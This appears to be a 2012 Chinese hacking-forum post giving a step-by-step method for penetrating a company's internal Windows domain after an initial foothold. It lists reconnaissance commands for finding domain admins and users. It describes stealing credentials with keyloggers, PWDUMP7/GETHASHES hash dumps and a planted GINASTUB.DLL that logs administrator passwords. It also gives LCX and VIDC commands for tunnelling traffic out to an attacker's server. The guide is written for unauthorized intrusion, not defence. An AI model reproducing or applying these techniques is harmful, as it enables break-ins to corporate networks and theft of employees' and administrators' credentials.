内网渗透域的经验积累

[复制链接]
查看340 | 回复0 | 2012-4-1 19:22:36 | 显示全部楼层 |阅读模式
1.收集信息。


1-1.不论什么途径获得的内网机器,确定他在内网后,我们首先就要了解这台机器的所属人员,如果我们的目标是公司,那我们就要了解这个人在公司里的职位,他是个什么身份,有多大的权利,这都关系到他在内网里的权限。因为,作为大公司,一个高权限的人他在内网里所要用到的东西就多,那么相对他的机器,当然权限就会比一般普通员工的高很多,这在我的渗透过程中是常见的。


既然有了他的机器,那么翻翻他的电脑这是必要的,如果你说要怎么翻,你可以尝试熟悉他的电脑甚至比他本人还熟,那你就算了解详细了。一台个人用的电脑,从上面翻出与他自己相关的一些信息,和大量公司信息应该是没有问题的,除非,这是台新电脑。


1-2.了解了一定的人员信息,期间你要记下你所掌握到的账号,密码这些重要数据,以后有一定的用,所以,在你渗之前,不妨建个记事本将重要信息保存起来,写个记事本不会浪费你多少时间。接下来,我们就应该对这个网络进行一定的了解,他是一般的内网,还是域?一般大公司都会用域的,我们只需要查一下就知道,要想对他进行渗透,你就必须了解他的网络拓补,当然,一些太具体的物理上我们是无法了解的,我们只能了解我们所能知道的。不管他是INT,DMZ,LAN,我们必须足够掌握。在这,我们就会用到一定的命令,相信大家应该都很熟悉。


ipconfig/all查询一下本机的一些情况,IP段网关属于不属于域

netview查询一些存在联系的机器,一般以机器名显示,我们需要对其PING出IP,一是方便查询哪些重要机器的IP,二是方便查询存在几个段

netview/domain查询有几个域因为大型网络里面一般不止一个域的

netgroup/domain查询域里面的组

netuser/domain查询域用户

netgroup"domainadmins"/domain查询域管理用户组

这些都是我们需要了解的,当然有时候还会需要再查询一些信息,NET命令下你们都会找到,不需要我再重复,具体的情况具体分析问题。
 
2.信息归档


2-1。有了信息,我们就要对信息进行一定的归档,将每个机器名所对应的IP归档,方便用时不会乱。

 
2-2。查询出的用户,管理员,我们也必须归档。

 
2-3。查询信息时可能出现的有利用价值信息必须归档。

 
3.技术利用

 
3-1。不论是通过键盘记录。或者HASH的抓取,我们需要将账号,密码,邮箱,凡是涉及关键数据的全部保存,一方面是准备渗透的资料,二是防止当前利用机器会掉。

 
3-1-1。利用远控的键盘记录进行抓取。

 
3-1-2。利用PWDUMP7或者GETHASHES进行抓取HASH,然后破解。GETHASHESV1.4后可以抓取域的全部HASH。

 
3-1-3。用GINASTUB.DLL获取管理员的账号和密码。因为域管理员有权限登陆任何一台机器。种上这个只是方便记录他所登陆的密码。INSTALL后,会在SYSYTEM32下生成一个FAXMODE.INC文件记录密码。

 
3-2。有了内网,很多东西我们是没有必要直接在当前利用机器上操作的,别人虽然是内网,但是不代表他没有防御系统,所以,我们建立SOCKS或者VPN是很有必要的,建立SOCKS相信大家都会了吧。

 
3-2-1。我在这推荐VIDC这个工具,很方便,在CMD下直接操VIDC.EXE-D-PPORT就可以了。

 
3-2-2。在利用机器上使用LCX,CMD下LCX.EXE-SLAVE服务器IPPORT127.0.0.1PORT,然后到服务器上CMD下LCX.EXE-LISTEN服务器IPPORT任意PORT。

 
3-2-3。建立SOCKS后在本地可以用SOCKSCAP来进行连接,成功连接后该操作什么就看你们自己了。
基本上我们就只能操作这么多了,后面已经没有什么技术上的再使用或利用,但是这中间的经验不少,所需要处理的细节也不少。

*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则